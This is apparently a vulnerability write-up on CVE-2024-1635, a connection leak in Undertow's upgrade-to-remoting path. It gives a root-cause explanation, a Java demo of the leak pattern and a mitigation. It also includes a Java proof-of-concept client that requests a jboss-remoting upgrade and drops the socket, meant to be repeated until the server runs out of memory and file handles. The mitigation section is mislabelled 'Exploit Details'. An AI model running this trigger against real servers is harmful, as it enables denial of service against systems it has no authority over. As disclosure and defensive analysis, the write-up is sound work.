A critical vulnerability, CVE-2024-1635, has been found in the Undertow server in the code path that supports the wildfly-http-client protocol. It lets a remote client make the server leak connections, leading to exhaustion of both memory and the open file limit. In this post we walk through the details of this vulnerability, including the code snippet that triggers the weakness, links to the original references, and the mitigation.

Vulnerability Details

The vulnerability exists in the HTTP upgrade to remoting process: WriteTimeoutStreamSinkConduit leaks connections when the RemotingConnection is closed by the Remoting ServerConnectionOpenListener. Because the close happens at the Remoting layer, the Undertow WriteTimeoutStreamSinkConduit is never notified that the connection is gone, so the connection is leaked and memory and the open file limit are exhausted over time.

The reason behind the leak is that WriteTimeoutStreamSinkConduit schedules a write timeout task, and the entire object tree behind the conduit stays reachable through that task. The task is queued on the XNIO WorkerThread, which therefore holds a direct reference to the Undertow conduit and to the connection it wraps; as long as the task is neither cancelled nor executed, nothing can be garbage collected and the underlying socket stays open.
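The reference chain described above, reduced to its essentials, as an added illustration that is not Undertow's or XNIO's own code: a scheduled timeout task captures a hypothetical Conduit, the conduit is "closed" by another layer, and the scheduler's queue keeps the whole object tree alive unless the close also cancels the task. All class and method names here are made up for the demonstration.

```java
import java.util.concurrent.ScheduledFuture;
import java.util.concurrent.ScheduledThreadPoolExecutor;
import java.util.concurrent.TimeUnit;

public class TimeoutLeakDemo {
    // Hypothetical stand-in for the conduit/connection chain that leaks.
    static final class Conduit {
        final byte[] buffer = new byte[64 * 1024]; // per-connection state pinned by the task
        ScheduledFuture<?> timeoutTask;
        volatile boolean closed;

        // Leaky close: the connection is torn down by another layer, but the
        // timeout task is never cancelled, so the scheduler queue still references
        // this conduit (and its buffer) until the timeout fires.
        void closeWithoutCancel() { closed = true; }

        // Hardened close: the outermost layer cancels the timeout task as part of
        // closing, so nothing keeps the conduit reachable.
        void closeAndCancel() {
            closed = true;
            if (timeoutTask != null) { timeoutTask.cancel(false); timeoutTask = null; }
        }
    }

    static ScheduledFuture<?> armTimeout(ScheduledThreadPoolExecutor scheduler, Conduit c, long millis) {
        // The lambda captures `c`: this is the strong link from the worker thread to the conduit.
        return scheduler.schedule(() -> { if (!c.closed) { /* would time out the write */ } },
                                  millis, TimeUnit.MILLISECONDS);
    }

    // Opens and closes `n` connections and returns how many timeout tasks are still queued,
    // i.e. how many conduits remain reachable from the scheduler.
    static int queuedTasksAfterChurn(int n, boolean cancelOnClose) {
        ScheduledThreadPoolExecutor scheduler = new ScheduledThreadPoolExecutor(1);
        scheduler.setRemoveOnCancelPolicy(true); // cancelled tasks leave the queue immediately
        for (int i = 0; i < n; i++) {
            Conduit c = new Conduit();
            c.timeoutTask = armTimeout(scheduler, c, 10 * 60 * 1000L); // long write timeout
            if (cancelOnClose) c.closeAndCancel(); else c.closeWithoutCancel();
        }
        int queued = scheduler.getQueue().size();
        scheduler.shutdownNow();
        return queued;
    }

    public static void main(String[] args) {
        System.out.println("leaky close,      1000 connections -> queued tasks: " + queuedTasksAfterChurn(1000, false));
        System.out.println("cancelling close, 1000 connections -> queued tasks: " + queuedTasksAfterChurn(1000, true));
    }
}
```

The first line reports 1000 queued tasks (every closed conduit still reachable), the second reports 0; the same pattern is what a heap dump of an affected server shows as a growing chain from the XNIO worker's task queue to conduits and sockets.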

The following code snippet demonstrates how a client can trigger this vulnerability: it starts an HTTP upgrade to jboss-remoting and then drops the connection.

import java.io.IOException;
import java.io.OutputStream;
import java.net.Socket;
import java.nio.charset.StandardCharsets;

public class UndertowConnectionLeakExploit {
    public static void main(String[] args) throws IOException {
        // Target address and port are placeholders; adjust to the Undertow instance under test.
        String targetIP = "127.0.0.1";
        int targetPort = 8080;

        try (Socket socket = new Socket(targetIP, targetPort)) {
            OutputStream out = socket.getOutputStream();
            // Request an HTTP upgrade to the jboss-remoting protocol.
            out.write("POST / HTTP/1.1\r\n".getBytes(StandardCharsets.UTF_8));
            out.write("Host: localhost\r\n".getBytes(StandardCharsets.UTF_8));
            out.write("Upgrade: jboss-remoting\r\n".getBytes(StandardCharsets.UTF_8));
            out.write("\r\n".getBytes(StandardCharsets.UTF_8));
            out.write("\r\n".getBytes(StandardCharsets.UTF_8));
            out.flush();
            // Drop the connection right after the upgrade is requested; the server-side
            // close goes through Remoting, and the Undertow conduit is never told.
            socket.close();
        }
    }
}

Sent repeatedly, this request bombards the Undertow server with connections that are opened and then abandoned; each one is leaked on the server side, so the server eventually exhausts its memory and its open file limit.

Original References

1. Undertow Official Repository
2. XNIO GitHub Repository
3. WildFly HTTP Client Repository

Exploit Details

To mitigate this vulnerability, developers need to ensure that Undertow's WriteTimeoutStreamSinkConduit is aware of the connection's outermost layer during the connection opening procedure. With that awareness, a close initiated at the outer layer reaches the conduit, which can then cancel its timeout task and release the connection, eliminating the leak.

Conclusion

The Undertow vulnerability, CVE-2024-1635, in the wildfly-http-client protocol path causes exhaustion of memory and open file limits on affected servers. Developers should make sure that the Undertow WriteTimeoutStreamSinkConduit is aware of the outermost layer when the connection is closed during the connection opening procedure. Applying that fix, or upgrading to a release that contains it, protects servers from this kind of connection leak.

Timeline

Published on: 02/19/2024 22:15:48 UTC
Last modified on: 03/22/2024 19:15:08 UTC